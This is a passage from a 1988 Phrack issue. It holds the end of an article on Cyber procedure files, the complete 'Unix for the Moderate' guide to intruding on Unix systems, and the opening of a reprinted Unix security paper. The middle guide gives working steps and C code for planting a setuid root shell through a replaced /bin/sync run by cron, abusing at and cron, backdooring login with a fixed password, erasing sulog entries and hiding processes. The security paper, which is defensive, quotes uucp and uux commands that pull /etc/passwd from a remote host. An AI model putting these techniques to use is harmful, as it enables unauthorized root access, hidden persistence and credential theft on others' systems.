  734.  
  735. A procedure file is similar to a batch file for MS-DOS, and a shell script for
  736. UNIX.  You can make a procedure file auto-execute by using the UPROC command
  737. like [uproc,auto] will make the file 'auto', auto execute.  There is also a
  738. special procedure file called the procfile in which any procedure may be
  739. accessed by simply a - in front of it.  If your procfile read:
  740.  
  741. .proc,cn.
  742. .*  sample procedure
  743. $catlist/un=7etpdoc.
  744. $exit.
  745.  
  746. then you could simply type -cn and the / prompt and it would execute the
  747. catlist command.  Now back to uprocs,  you could easily write a whole BBS in a
  748. procedure file or say you wanted to run a chat system and you did not want
  749. people to change the password on your account, you could do this:
  750.  
  751. .proc,chat,
  752. PW"Password: "=(*A).
  753. $ife,PW="cyber",yes.
  754.    $chat.
  755.    $revert.
  756.    $bye.
  757. $else,yes.
  758.    $note./Wrong password, try again/.
  759.    $revert.
  760.    $bye.
  761. $endif,yes.
  762.  
  763. This procedure will ask the user for a password and if he doesn't type "cyber"
  764. he will be logged off.  If he does get it right then he will be dumped into
  765. the chat program and as soon as he exits the chat program, he will be logged
  766. off.  This way, the user cannot get into the batch subsystem and change your
  767. password or otherwise screw around with the account.  The following is a
  768. listing of the procfil that I use on my local system, it has a lot of handy
  769. utilities and examples...
  770.  
  771. ----  cut here  ----
  772.  
  773. .PROC,B.
  774. .******BYE******
  775. $DAYFILE.
  776. $NOTE.//////////////////////////
  777. $ASCII.
  778. $BYE.
  779. $REVERT,NOLIST.
  780. #EOR
  781. .PROC,TIME.
  782. .******GIVES DAY AND TIME******
  783. $NOTE./THE CURRENT DAY AND TIME IS/
  784. $FIND,CLOCK./
  785. $REVERT,NOLIST.
  786. #EOR
  787. .PROC,SIGN*I,IN.
  788. .******SIGN PRINT UTILITY******.
  789. $GET,IN.
  790. $FIND,SIGN,#I=IN,#L=OUT.
  791. $NOTE./TO PRINT, TYPE:   PRINT,OUT,CC,RPS=??/
  792. $REVERT,NOLIST.
  793. #EOR
  794. .PROC,TA.
  795. .******TALK******
  796. $SACFIND,AID,COMM.
  797. $REVERT,NOLIST.
  798. #EOR
  799. .PROC,DIR,UN=,FILE=.
  800. .******DIRECTORY LISTING OF PERMANENT FILES******
  801. $GET(ZZZZDIR=CAT/#UN=1GTL0CL)
  802. ZZZZDIR(FILE,#UN=UN)
  803. $RETURN(ZZZZDIR)
  804. $REVERT,NOLIST.
  805. #EOR
  806. .PROC,Z19.
  807. .******SET SCREEN TO Z19******
  808. $SCREEN,Z19.
  809. $NOTE./SCREEN,Z19.
  810. $REVERT,NOLIST.
  811. #EOR
  812. .PROC,VT.
  813. .******SET SCREEN TO VT100******
  814. $SCREEN,VT100.
  815. $NOTE./SCREEN,VT100.
  816. $REVERT,NOLIST
  817. #EOR
  818. .PROC,SC.
  819. .******SET SCREEN TO T10******
  820. $SCREEN,T10.
  821. $NOTE./SCREEN,T10.
  822. $REVERT,NOLIST
  823. #EOR
  824. .PROC,C.
  825. .******CATLIST******
  826. $CATLIST.
  827. $REVERT,NOLIST.
  828. #EOR
  829. .PROC,CA.
  830. .******CATLIST,LO=F******
  831. $CATLIST,LO=F.
  832. $REVERT,NOLIST.
  833. #EOR
  834. .PROC,MT.
  835. .******BBS******
  836. $SACFIND,AID,MTAB.
  837. $REVERT,NOLIST.
  838. #EOR
  839. .PROC,LI,FILE=.
  840. .******LIST FILE******
  841. $GET,FILE.
  842. $ASCII.
  843. $COPY(FILE)
  844. $REVERT.
  845. $EXIT.
  846. $CSET(NORMAL)
  847. $REVERT,NOLIST. WHERE IS THAT FILE??
  848. #EOR
  849. .PROC,LOCAL.
  850. .******DIRECTORY OF LOCAL FILES******
  851. $RETURN(PROCLIB,YYYYBAD,YYYYPRC)
  852. $GET(QQQFILE=ENQF/UN=1GTL0CL)
  853. QQQFILE.
  854. $REVERT,NOLIST.
  855. $EXIT.
  856. $REVERT. FILES ERROR
  857. #EOR
  858. .PROC,RL.
  859. .******RAISE LIMITS******
  860. $SETASL(*)
  861. $SETJSL(*)
  862. $SETTL(*)
  863. $CSET(ASCII)
  864. $NOTE./ Limits now at max validated levels.
  865. $CSET(NORMAL)
  866. $REVERT,NOLIST.
  867. #EOR
  868. .PROC,CL.
  869. .******CLEAR******
  870. $CLEAR,*.
  871. $CSET(ASCII)
  872. $NOTE./LOCAL FILE AREA CLEARED
  873. $REVERT,NOLIST.
  874. #EOR
  875. .PROC,P,FILE=THING,LST=LIST.
  876. .***********************************************************
  877. $CLEAR.
  878. $GET(FILE)
  879. $PASCAL4,FILE,LST.
  880. $REVERT.
  881. $EXIT.
  882. $REWIND,*.
  883. $CSET(ASCII)
  884. $COPY(LIST)
  885. $CSET(NORMAL)
  886. $REVERT,NOLIST.
  887. #EOR
  888. .PROC,RE.
  889. .******REWIND******
  890. $REWIND,*.
  891. $CSET(ASCII)
  892. $NOTE./REWOUND.
  893. $REVERT,NOLIST.
  894. #EOR
  895. .PROC,FOR,FILE,LST=LIST.
  896. .********************************************************************
  897. $CLEAR.
  898. $GET(FILE)
  899. $FTN5,I=FILE,L=LST.
  900. $REPLACE(LST=L)
  901. $CSET(ASCII)
  902. $REVERT. Fortran Compiled
  903. $EXIT.
  904. $REWIND,*.
  905. $COPY(LST)
  906. $REVERT. That's all folks.
  907. #EOR
  908. .PROC,WAR.
  909. .******WARBLES******
  910. $SACFIND,AID,WAR.
  911. $REVERT,NOLIST.
  912. #EOR
  913. .PROC,M.
  914. .******MAIL/CHECK******
  915. $MAIL/CHECK.
  916. $REVERT,NOLIST.
  917. #EOR
  918. .PROC,MA.
  919. .******ENTER MAIL******
  920. $MAIL.
  921. $REVERT,NOLIST.
  922. #EOR
  923. .PROC,HE,FILE=SUMPROC,UN=.
  924. .******HELP FILE******
  925. $GET,FILE/#UN=UN.
  926. $COPY(FILE)
  927. $REVERT.
  928. $EXIT.
  929. $REVERT,NOLIST.
  930. #EOR
  931. .PROC,DYNAMO.
  932. .******WHO KNOWS??******
  933. $GET,DYNMEXP/UN=7ETPDOC.
  934. $SKIPR,DYNMEXP.
  935. $COPYBR,DYNMEXP,GO.
  936. $FIND,DYNAMO,GO.
  937. $REVERT,NOLIST.
  938. #EOR
  939. #EOR
  940. #EOI
  941.  
  942. ----  cut here  ----
  943.  
  944. I have covered procfil's fairly extensively as I think it is the most useful
  945. function of Cyber for hackers.  I will be releasing source codes for several
  946. programs including 'the communicator' chat utility, and a BBS program with a
  947. full message base.  If you have any questions about Cyber or you have gotten
  948. into one and don't know what to do, I can be contacted at the Forgotten Realm
  949. BBS or via UUCP mail at ...!uunet!ncoast!ghost.
  950.  
  951. Phrozen Ghost
  952. ===============================================================================
  953.  
  954.                                ==Phrack Inc.==
  955.  
  956.                      Volume Two, Issue 18, Phile #6 of 11
  957.  
  958. ------------------------------------------------------------------------------
  959.                             Unix for the Moderate
  960. -------------------------------------------------------------------------------
  961.                 By:  The Urvile, Necron 99, and a host of me.
  962. -------------------------------------------------------------------------------
  963.  
  964. Disclaimer:
  965.  
  966.    This is mainly for system five.  I do reference BSD occasionally, but I
  967.    mark those.  All those little weird brands (i.e., DEC's Ultrix, Xenix, and
  968.    so on) can go to hell.
  969.  
  970.  
  971. Security:  (Improving yours.)
  972.  
  973.    -Whenever logging onto a system, you should always do the following:
  974.        $ who -u
  975.        $ ps -ef
  976.        $ ps -u root
  977.  
  978.    or BSD:
  979.        $ who; w; ps uaxg
  980.    This prints out who is on, who is active, what is going on presently,
  981.    everything in the background, and so on.
  982.  
  983.    And the ever popular:
  984.        $ find / -name "*log*" -print
  985.    This lists out all the files with the name 'log' in it.  If you do find a
  986.    process that is logging what you do, or an odd log file, change it as soon
  987.    as you can.
  988.  
  989.    If you think someone may be looking at you and you don't want to leave
  990.    (Useful for school computers) then go into something that allows shell
  991.    breaks, or use redirection to your advantage:
  992.        $ cat < /etc/passwd
  993.    That puts 'cat' on the ps, not 'cat /etc/passwd'.
  994.  
  995.    If you're running a setuid process, and don't want it to show up on a ps
  996.    (Not a very nice thing to have happen), then:
  997.        $ super_shell
  998.        # exec sh
  999.    Runs the setuid shell (super_shell) and puts something 'over' it. You may
  1000.    also want to run 'sh' again if you are nervous, because if you break out of
  1001.    an exec'ed process, you die.  Neat, huh?
  1002.  
  1003.  
  1004. Improving your id:
  1005.  
  1006.    -First on, you should issue the command 'id' & it will tell you you your
  1007.    uid and euid.  (BSD:  whoami; >/tmp/xxxx;ls -l /tmp/xxxx will tell you your
  1008.    id [whoami] and your euid [ls -l].), terribly useful for checking on setuid
  1009.    programs to see if you have root euid privs. Also, do this:
  1010.        $ find / -perm -4000 -exec /bin/ls -lad {} ";"
  1011.    Yes, this finds and does an extended list of all the files that have the
  1012.    setuid bit on them, like /bin/login, /bin/passwd, and so on.  If any of
  1013.    them look nonstandard, play with them, you never can tell what a ^| will do
  1014.    to them sometimes.  Also, if any are writeable and executable, copy sh over
  1015.    them, and you'll have a setuid root shell. Just be sure to copy whatever
  1016.    was there back, otherwise your stay will probably be shortened a bit.
  1017.  
  1018.    -What, you have the bin passwd?
  1019.  
  1020.    Well, game over.  You have control of the system.  Everything in the bin
  1021.    directory is owned by bin (with the exception of a few things), so you can
  1022.    modify them at will.  Since cron executes a few programs as root every once
  1023.    in a while, such as /bin/sync, try this:
  1024.  
  1025.        main()
  1026.           {
  1027.                if (getuid()==0 || getuid()==0)        {
  1028.                     system("cp /bin/sh /tmp/sroot");
  1029.                     system("chmod 4777 /tmp/sroot");  }
  1030.                sync();
  1031.           }
  1032.  
  1033.        $ cc file.c
  1034.        $ cp /bin/sync /tmp/sync.old
  1035.        $ mv a.out /bin/sync
  1036.        $ rm file.c
  1037.  
  1038.    Now, as soon as cron runs /bin/sync, you'll have a setuid shell in
  1039.    /tmp/sroot.  Feel free to hide it.
  1040.  
  1041.    -the 'at' & 'cron' commands:
  1042.  
  1043.    Look at the 'at' dir.  Usually /usr/spool/cron/atjobs.  If you can run 'at'
  1044.    (check by typing 'at'), and 'lasttimedone' is writable, then: submit a
  1045.    blank 'at' job, edit 'lastimedone' to do what you want it to do, and move
  1046.    lasttimedone over your entry (like 88.00.00.00).  Then the commands you put
  1047.    in lasttimedone will be ran as that file's owner.  Cron:  in
  1048.    /usr/spool/cron/cronjobs, there are a list of people running cron jobs.
  1049.    Cat root's, and see if he runs any of the programs owned by you (Without
  1050.    doing a su xxx -c "xxx").  For matter, check all the crons.  If you can
  1051.    take one system login, you should be able to get the rest, in time.
  1052.  
  1053.    -The disk files.
  1054.  
  1055.    These are rather odd.  If you have read permission on the disks in /dev,
  1056.    then you can read any file on the system.  All you have to do is find it in
  1057.    there somewhere.  If the disk is writeable, if you use /etc/fsbd, you can
  1058.    modify any file on the system into whatever you want, such as by changing
  1059.    the permissions on /bin/sh to 4555.  Since this is pretty difficult to
  1060.    understand (and I don't get it fully), then I won't bother with it any
  1061.    more.
  1062.  
  1063.    -Trivial su.
  1064.  
  1065.    You know with su you can log into anyone else's account if you know their
  1066.    passwords or if you're root.  There are still a number of system 5's that
  1067.    have uid 0, null passwd, rsh accounts on them.  Just be sure to remove your
  1068.    entry in /usr/adm/sulog.
  1069.  
  1070.    -Trojan horses?  On Unix?
  1071.  
  1072.    Yes, but because of the shell variable PATH, we are generally out of luck,
  1073.    because it usually searches /bin and /usr/bin first.  However, if the first
  1074.    field is a colon, files in the present directory are searched first.  Which
  1075.    means if you put a modified version of 'ls' there, hey.  If this isn't the
  1076.    case, you will have to try something more blatant, like putting it in a
  1077.    game (see Shooting Shark's file a while back).  If you have a system login,
  1078.    you may be able to get something done like that.  See cron.
  1079.  
  1080.  
  1081. Taking over:
  1082.  
  1083.    Once you have root privs, you should read all the mail in /usr/mail, just
  1084.    to sure nothing interesting is up, or anyone is passing another systems
  1085.    passwds about.  You may want to add another entry to the passwd file, but
  1086.    that's relatively dangerous to the life of your machine.  Be sure not to
  1087.    have anything out of the ordinary as the entry (i.e., No uid 0).
  1088.  
  1089.    Get a copy of the login program (available at your nearest decent BBS, I
  1090.    hope) of that same version of Unix, and modify it a bit:  on system 5,
  1091.    here's a modification pretty common:  in the routine to check correct
  1092.    passwds, on the line before the actual pw check, put a if
  1093.    (!(strcmp(pswd,"woof"))) return(1); to check for your 'backdoor', enabling
  1094.    you to log on as any valid user that isn't uid 0 (On system 5).
  1095.  
  1096.  
  1097. Neato things:
  1098.  
  1099.    -Have you ever been on a system that you couldn't get root or read the
  1100.    Systems/L.sys file?  Well, this is a cheap way to overcome it:  'uuname'
  1101.    will list all machines reachable by your Unix, then (Assuming they aren't
  1102.    Direct, and the modem is available):
  1103.        $ cu -d host.you.want            [or]
  1104.        $ uucico -x99 -r1 -shost.you.want
  1105.    Both will do about the same for us.  This will fill your screen with lots
  1106.    of trivial material, but will eventually get to the point of printing the
  1107.    phone number to the other system.  -d enables the cu diagnostics, -x99
  1108.    enables the uucico highest debug, and -R1 says 'uucp master'.
  1109.  
  1110.    Back a year or two, almost everywhere had their uucp passwd set to the same
  1111.    thing as their nuucp passwd (Thanks to the Systems file), so it was a
  1112.    breeze getting in.  Even nowadays, some places do it.. You never can tell.
  1113.  
  1114.    -Uucp:
  1115.  
  1116.    I personally don't like the uucp things.  Uucico and uux are limited by the
  1117.    Permissions file, and in most cases, that means you can't do anything
  1118.    except get & take from the uucppublic dirs.  Then again, if the
  1119.    permission/L.cmd is blank, you should be able to take what files that you
  1120.    want.  I still don't like it.
  1121.  
  1122.    -Sending mail:
  1123.  
  1124.    Sometimes, the mail program checks only the shell var LOGNAME, so change
  1125.    it, export it, and you may be able to send mail as anyone.  (Mainly early
  1126.    system 5's.)
  1127.        $ LOGNAME="root";export LOGNAME
  1128.  
  1129.    -Printing out all the files on the system:
  1130.  
  1131.    Useful if you're interested in the filenames.
  1132.        $ find / -print >file_list&
  1133.    And then do a 'grep text file_list' to find any files with 'text' in their
  1134.    names.  Like grep [.]c file_list, grep host file_list....
  1135.  
  1136.    -Printing out all restricted files:
  1137.  
  1138.    Useful when you have root. As a normal user, do:
  1139.        $ find / -print >/dev/null&
  1140.    This prints out all nonaccessable directories, so become root and see what
  1141.    they are hiding.
  1142.  
  1143.    -Printing out all the files in a directory:
  1144.  
  1145.    Better looking than ls -R:
  1146.        $ find . -print
  1147.    It starts at the present dir, and goes all the way down.  Catches all
  1148.    '.files', too.
  1149.  
  1150.    -Rsh:
  1151.  
  1152.    Well in the case of having an account with rsh only, check your 'set'.  If
  1153.    SHELL is not /bin/sh, and you are able to run anything with a shell escape
  1154.    (ex, ed, vi, write, mail...), you should be put into sh if you do a '!sh'.
  1155.    If you have write permission on your .profile, change it, because rsh is
  1156.    ran after checking profile.
  1157.  
  1158.    -Humor:
  1159.  
  1160.    On a system 5, do a:
  1161.        $ cat "food in cans"
  1162.  
  1163.    or on a csh, do:
  1164.        % hey unix, got a match?
  1165.  
  1166.    Well, I didn't say it was great.
  1167.  
  1168.  
  1169. Password hacking:
  1170.  
  1171.    -Salt:
  1172.  
  1173.    In a standard /etc/passwd file, passwords are 13 characters long.  This is
  1174.    an 11 char encrypted passwd and a 2 char encryption modifier (salt), which
  1175.    is used to change the des algorithm in one of 4096<?> ways.  Which means
  1176.    there is no decent way to go and reverse hack it.  Yet.
  1177.  
  1178.    On normal system 5 Unix, passwords are supposed to be 6-8 characters long
  1179.    and have both numeric and alphabetic characters in them, which makes a
  1180.    dictionary hacker pretty worthless.  However, if a user keeps insisting his
  1181.    password is going to be 'dog,' usually the system will comply (depending on
  1182.    version).  I have yet to try it, but having the hacker try the normal
  1183.    entry, and then the entry terminated by [0-9] is said to have remarkable
  1184.    results, if you don't mind the 10-fold increase in time.
  1185.  
  1186.  
  1187. Final notes:
  1188.  
  1189.    Yes, I have left a lot out.  That seems to be the rage nowadays..  If you
  1190.    have noticed something wrong, or didn't like this, feel free to tell me.
  1191.    If you can find me.
  1192.  
  1193. -------------------------------------------------------------------------------
  1194.                     Hi Ho.  Here ends part one.  <Of one?>
  1195. -------------------------------------------------------------------------------
  1196.                  Produced and directed by: Urvile & Necron 99
  1197. ----------------------------------------------------------- (c)  ToK inc., 1988
  1198.  
  1199.                                ==Phrack Inc.==
  1200.  
  1201.                      Volume Two, Issue 18, Phile #7 of 11
  1202.  
  1203.                    +--------------------------------------+
  1204.                    |     "Unix System Security Issues"    |
  1205.                    |              Typed by:               |
  1206.                    |               Whisky                 |
  1207.                    |         (from Holland, Europe)       |
  1208.                    +--------------------------------------+
  1209.                    |                 From                 |
  1210.                    |            Information Age           |
  1211.                    |     Vol. 11, Number 2, April 1988    |
  1212.                    |              Written By:             |
  1213.                    | Michael J. Knox and Edward D. Bowden |
  1214.                    +--------------------------------------+
  1215.  
  1216. Note:  This file was sent to me from a friend in Holland. I felt
  1217.        that it would be a good idea to present this file to the
  1218.        UNIX-hacker community, to show that hackers don't always
  1219.        harm systems, but sometimes look for ways to secure flaws
  1220.        in existing systems.  -- Jester Sluggo !!
  1221.  
  1222. There are a number of elements that have lead to the popularity of the Unix
  1223. operating system in the world today.  The most notable factors are its
  1224. portability among hardware platforms and the interactive programming
  1225. environment that it offers to users.  In fact, these elements have had much to
  1226. do with the successful evolution of the Unix system in the commercial market
  1227. place. (1, 2)
  1228.   As the Unix system expands further into industry and government, the need to
  1229. handle Unix system security will no doubt become imperative.  For example, the
  1230. US government is committing several million dollars a year for the Unix system
  1231. and its supported hardware.  (1) The security requirements for the government
  1232. are tremendous, and one can only guess at the future needs of security in
  1233. industry.
  1234.   In this paper, we will cover some of the more fundamental security risks in
  1235. the Unix system.  Discussed are common causes of Unix system compromise in
  1236. such areas as file protection, password security, networking and hacker
  1237. violations.  In our conclusion, we will comment upon ongoing effects in Unix
  1238. system security, and their direct influence on the portability of the Unix
  1239. operating system.
  1240.  
  1241. FILE AND DIRECTORY SECURITY
  1242.  
  1243. In the Unix operating system environment, files and directories are organized
  1244. in a tree structure with specific access modes.  The setting of these modes,
  1245. through permission bits (as octal digits), is the basis of Unix system
  1246. security.  Permission bits determine how users can access files and the type
  1247. of access they are allowed.  There are three user access modes for all Unix
  1248. system files and directories:  the owner, the group, and others.  Access to
  1249. read, write and execute within each of the usertypes is also controlled by
  1250. permission bits (Figure 1).  Flexibility in file security is convenient, but
  1251. it has been criticized as an area of system security compromise.
  1252.  
  1253.  
  1254.                         Permission modes
  1255. OWNER                        GROUP                    OTHERS
  1256. ------------------------------------------------------------
  1257. rwx            :             rwx            :         rwx
  1258. ------------------------------------------------------------
  1259. r=read  w=write  x=execute
  1260.  
  1261. -rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file
  1262. drwx------ 2 sam A1 2 May 01 12:01 directory
  1263.  
  1264. FIGURE 1.  File and directory modes:  File shows Bob as the owner, with read
  1265. and write permission.  Group has write permission, while Others has read and
  1266. execute permission.  The directory gives a secure directory not readable,
  1267. writeable, or executable by Group and Others.
  1268.  
  1269.  
  1270.   Since the file protection mechanism is so important in the Unix operating
  1271. system, it stands to reason that the proper setting of permission bits is
  1272. required for overall security.  Aside from user ignorance, the most common
  1273. area of file compromise has to do with the default setting of permission bits
  1274. at file creation.  In some systems the default is octal 644, meaning that only
  1275. the file owner can write and read to a file, while all others can only read
  1276. it.  (3) In many "open" environments this may be acceptable.  However, in
  1277. cases where sensitive data is present, the access for reading by others should
  1278. be turned off. The file utility umask does in fact satisfy this requirement.
  1279. A suggested setting, umask 027, would enable all permission for the file
  1280. owner, disable write permission to the group, and disable permissions for all
  1281. others (octal 750).  By inserting this umask command in a user .profile or
  1282. .login file, the default will be overwritten by the new settings at file
  1283. creation.
  1284.   The CHMOD utility can be used to modify permission settings on files and
  1285. directories.  Issuing the following command,
  1286.  
  1287. chmod u+rwd,g+rw,g-w,u-rwx file
  1288.  
  1289. will provide the file with the same protection as the umask above (octal 750).
  1290. Permission bits can be relaxed with chmod at a later time, but at least
  1291. initially, the file structure can be made secure using a restrictive umask.
  1292.   By responsible application of such utilities as umask and chmod, users can
  1293. enhance file system security.  The Unix system, however, restricts the
  1294. security defined by the user to only owner, group and others.  Thus, the owner
  1295. of the file cannot designate file access to specific users.  As Kowack and
  1296. Healy have pointed out, "The granularity of control that (file security)
  1297. mechanisms is often insufficient in practice (...) it is not possible to grant
  1298. one user write protection to a directory while granting another read
  1299. permission to the same directory.  (4) A useful file security file security
  1300. extension to the Unix system might be Multics style access control lists.
  1301.   With access mode vulnerabilities in mind, users should pay close attention
  1302. to files and directories under their control, and correct permissions whenever
  1303. possible.  Even with the design limitations in mode granularity, following a
  1304. safe approach will ensure a more secure Unix system file structure.
  1305.  
  1306. SUID and SGID
  1307.  
  1308. The set user id (suid) and set group id (sgid) identify the user and group
  1309. ownership of a file.  By setting the suid or sgid permission bits of an
  1310. executable file, other users can gain access to the same resources (via the
  1311. executable file) as that of the real file's owner.
  1312.  
  1313. For Example:
  1314.  
  1315. Let Bob's program bob.x be an executable file accessible to others.  When Mary
  1316. executes bob.x, Mary becomes the new program owner.  If during program
  1317. execution bob.x requests access to file browse.txt, then Mary must have
  1318. previous read or write permission to browse.txt.  This would allow Mary and
  1319. everyone else total access to the contents of browse.txt, even when she is not
  1320. running bob.x.  By turning on the suid bit of bob.x, Mary will have the same
  1321. access permissions to browse.txt as does the program's real owner, but she
  1322. will only have access to browse.txt during the execution of bob.x.  Hence, by
  1323. incorporating suid or sgid, unwelcome browsers will be prevented from
  1324. accessing files like browse.txt.
  1325.  
  1326.   Although this feature appears to offer substantial access control to Unix
  1327. system files, it does have one critical drawback.  There is always the chance
  1328. that the superuser (system administrator) may have a writable file for others
  1329. that is also set with suid.  With some modification in the file's code (by a
  1330. hacker), an executable file like this would enable a user to become a
  1331. superuser.  Within a short period of time this violator could completely
  1332. compromise system security and make it inaccessible, even to other superusers.
  1333. As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by
  1334. root is better than knowing the root password".
  1335.   To compensate for this security threat, writable suid files should be sought
  1336. out and eliminated by the system administrator.  Reporting of such files by
  1337. normal users is also essential in correcting existing security breaches.
  1338.  
  1339. DIRECTORIES
  1340.  
  1341. Directory protection is commonly overlooked component of file security in the
  1342. Unix system.  Many system administrators and users are unaware of the fact,
  1343. that "publicly writable directories provide the most opportunities for
  1344. compromising the Unix system security" (6). Administrators tend to make these
  1345. "open" for users to move around and access public files and utilities.  This
  1346. can be disastrous, since files and other subdirectories within writable
  1347. directories can be moved out and replaced with different versions, even if
  1348. contained files are unreadable or unwritable to others.  When this happens, an
  1349. unscrupulous user or a "password breaker" may supplant a Trojan horse of a
  1350. commonly used system utility (e.g. ls, su, mail and so on).  For example,
  1351. imagine
  1352.  
  1353. For example:
  1354.  
  1355. Imagine that the /bin directory is publicly writable.  The perpetrator could
  1356. first remove the old su version (with rm utility) and then include his own
  1357. fake su to read the password of users who execute this utility.
  1358.  
  1359.   Although writable directories can destroy system integrity, readable ones
  1360. can be just as damaging.  Sometimes files and directories are configured to
  1361. permit read access by other.  This subtle convenience can lead to unauthorized
  1362. disclosure of sensitive data:  a serious matter when valuable information is
  1363. lost to a business competitor.
  1364.   As a general rule, therefore, read and write access should be removed from
  1365. all but system administrative directories.  Execute permission will allow
  1366. access to needed files; however, users might explicitly name the file they
  1367. wish to use.  This adds some protection to unreadable and unwritable
  1368. directories.  So, programs like lp file.x in an unreadable directory /ddr will
  1369. print the contents of file.x, while ls/ddr would not list the contents of that
  1370. directory.
  1371.  
  1372. PATH VARIABLE
  1373.  
  1374. PATH is an environment variable that points to a list of directories, which
  1375. are searched when a file is requested by a process.  The order of that search
  1376. is indicated by the sequence of the listed directories in the PATH name.  This
  1377. variable is established at user logon and is set up in the users .profile of
  1378. .login file.
  1379.   If a user places the current directory as the first entry in PATH, then
  1380. programs in the current directory will be run first.  Programs in other
  1381. directories with the same name will be ignored.  Although file and directory
  1382. access is made easier with a PATH variable set up this way, it may expose the
  1383. user to pre-existing Trojan horses.
  1384.   To illustrate this, assume that a Trojan horse, similar to the cat utility,
  1385. contains an instruction that imparts access privileges to a perpetrator.  The
  1386. fake cat is placed in a public directory /usr/his where a user often works.
  1387. Now if the user has a PATH variable with the current directory first, and he
  1388. enters the cat command while in /usr/his, the fake cat in /usr/his would be
  1389. executed but not the system cat located in /bin.
  1390.   In order to prevent this kind of system violation, the PATH variable must be
  1391. correctly set.  First, if at all possible, exclude the current directory as
  1392. the first entry in the PATH variable and type the full path name when invoking
  1393. Unix system commands.  This enhances file security, but is more cumbersome to
  1394. work with.  Second, if the working directory must be included in the PATH
  1395. variable, then it should always be listed last.  In this way, utilities like
  1396. vi, cat, su and ls will be executed first from systems directories like /bin
  1397. and /usr/bin before searching the user's working directory.
  1398.  
  1399. PASSWORD SECURITY
  1400.  
  1401. User authentication in the Unix system is accomplished by personal passwords.
  1402. Though passwords offer an additional level of security beyond physical
  1403. constraints, they lend themselves to the greatest area of computer system
  1404. compromise.  Lack of user awareness and responsibility contributes largely to
  1405. this form of computer insecurity.  This is true of many computer facilities
  1406. where password identification, authentication and authorization are required
  1407. for the access of resources - and the Unix operating system is no exception.
  1408.   Password information in many time-sharing systems are kept in restricted
  1409. files that are not ordinarily readable by users.  The Unix system differs in
  1410. this respect, since it allows all users to have read access to the /etc/passwd
  1411. file (FIGURE 2) where encrypted passwords and other user information are
  1412. stored.  Although the Unix system implements a one-way encryption method, and
  1413. in most systems a modified version of the data encryption standard (DES),
  1414. password breaking methods are known. Among these methods, brute-force attacks
  1415. are generally the least effective, yet techniques involving the use of
  1416. heuristics (good guesses and knowledge about passwords) tend to be successful.
  1417. For example, the /etc/passwd file contains such useful information as the
  1418. login name and comments fields.  Login names are especially rewarding to the
  1419. "password breaker" since many users will use login variants for passwords
  1420. (backward spelling, the appending of a single digit etc.).  The comment field
  1421. often contains items such as surname, given name, address, telephone number,
  1422. project name and so on.  To quote Morris and Grampp (7) in their landmark
  1423. paper on Unix system security:
  1424.  
  1425.   [in the case of logins]
  1426.  
  1427.   The authors made a survey of several dozen local machines, using as trial
  1428.   passwords a collection of the 20 most common female first names, each
  1429.   followed by a single digit.  The total number of passwords tried was,
  1430.   therefore, 200.  At least one of these 200 passwords turned out to be a
  1431.   valid password on every machine surveyed.
  1432.  
  1433.   [as for comment fields]
  1434.  
  1435.   (...) if an intruder knows something about the people using a machine, a
  1436.   whole new set of candidates is available.  Family and friend's names, auto
  1437.   registration numbers, hobbies, and pets are particularly productive
  1438.   categories to try interactively in the unlikely event that a purely
  1439.   mechanical scan of the password file turns out to be disappointing.
  1440.  
  1441. Thus, given a persistent system violator, there is a strong evidence, that he
  1442. will find some information about users in the /etc/passwd file. With this in
  1443. mind, it is obvious that a password file should be unreadable to everyone
  1444. except those in charge of system administration.
  1445.  
  1446.  
  1447. root:aN2z06ISmxKqQ:0:10:(Boss1),656-35-0989:/:/bin
  1448. mike:9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin
  1449.  
  1450. FIGURE 2.  The /etc/passwd file.  Note the comments field as underlined terms.
  1451.  
  1452.  
  1453.   Resolution of the /etc/passwd file's readability does not entirely solve the
  1454. basic problem with passwords.  Educating users and administrators is necessary
  1455. to assure proper password utilization. First, "good passwords are those that
  1456. are at least six characters long, aren't based on personal information, and
  1457. have some non-alphabetic (especially control) characters in them:  4score,
  1458. my_name, luv2run" (8).  Secondly, passwords should be changed periodically but
  1459. users should avoid alternating between two passwords.  Different passwords for
  1460. different machines and files will aid in protecting sensitive information.
  1461. Finally, passwords should never be available to unauthorized users. Reduction
  1462. of user ignorance about poor password choice will inevitably make a system
  1463. more secure.
  1464.  
  1465. NETWORK SECURITY
  1466.  
  1467. UUCP system
  1468. The most common Unix system network is the UUCP system, which is a group of
  1469. programs that perform the file transfers and command execution between remote
  1470. systems.  (3) The problem with the UUCP system is that users on the network
  1471. may access other users' files without access permission.  As stated by Nowitz
  1472. (9),
  1473.  
  1474.   The uucp system, left unrestricted, will let any outside user execute
  1475.   commands and copy in/out any file that is readable/writable by a uucp login
  1476.   user.  It is up to the individual sites to be aware of this, and apply the
  1477.   protections that they feel free are necessary.
  1478.  
  1479. This emphasizes the importance of proper implementation by the system
  1480. administrator.
  1481.   There are four UUCP system commands to consider when looking into network
  1482. security with the Unix system.  The first is uucp, a command used to copy
  1483. files between two Unix systems.  If uucp is not properly implemented by the
  1484. system administrator, any outside user can execute remote commands and copy
  1485. files from another login user.  If the file name on another system is known,
  1486. one could use the uucp command to copy files from that system to their system.
  1487. For example:
  1488.  
  1489.   %uucp system2!/main/src/hisfile myfile
  1490.  
  1491. will copy hisfile from system2 in the directory /main/src to the file myfile
  1492. in the current local directory.  If file transfer restrictions exist on either
  1493. system, hisfile would not be sent.  If there are no restrictions, any file
  1494. could be copied from a remote user - including the password file.  The
  1495. following would copy the remote system /etc/passwd file to the local file
  1496. thanks:
  1497.  
  1498.   %uucp system2!/etc/passwd thanks
  1499.  
  1500. System administrators can address the uucp matter by restricting uucp file
  1501. transfers to the directory /user/spool/uucppublic.  (8) If one tries to
  1502. transfer a file anywhere else, a message will be returned saying "remote
  1503. access to path/file denied" and no file transfer will occur.
  1504.   The second UUCP system command to consider is the uux.  Its function is to
  1505. execute commands on remote Unix computers.  This is called remote command
  1506. execution and is most often used to send mail between systems (mail executes
  1507. the uux command internally).
  1508.   The ability to execute a command on another system introduces a serious
  1509. security problem if remote command execution is not limited.  As an example, a
  1510. system should not allow users from another system to perform the following:
  1511.  
  1512.   %uux "system1!cat</etc/passwd>/usr/spool/uucppublic"
  1513.  
  1514. which would cause system1 to send its /etc/passwd file to the system2 uucp
  1515. public directory.  The user of system2 would now have access to the password
  1516. file.  Therefore, only a few commands should be allowed to execute remotely.
  1517. Often the only command allowed to run uux is rmail, the restricted mail
  1518. program.
  1519.   The third UUCP system function is the uucico (copy in / copy out) program.
  1520. It performs the true communication work.  Uucp or uux does not actually call
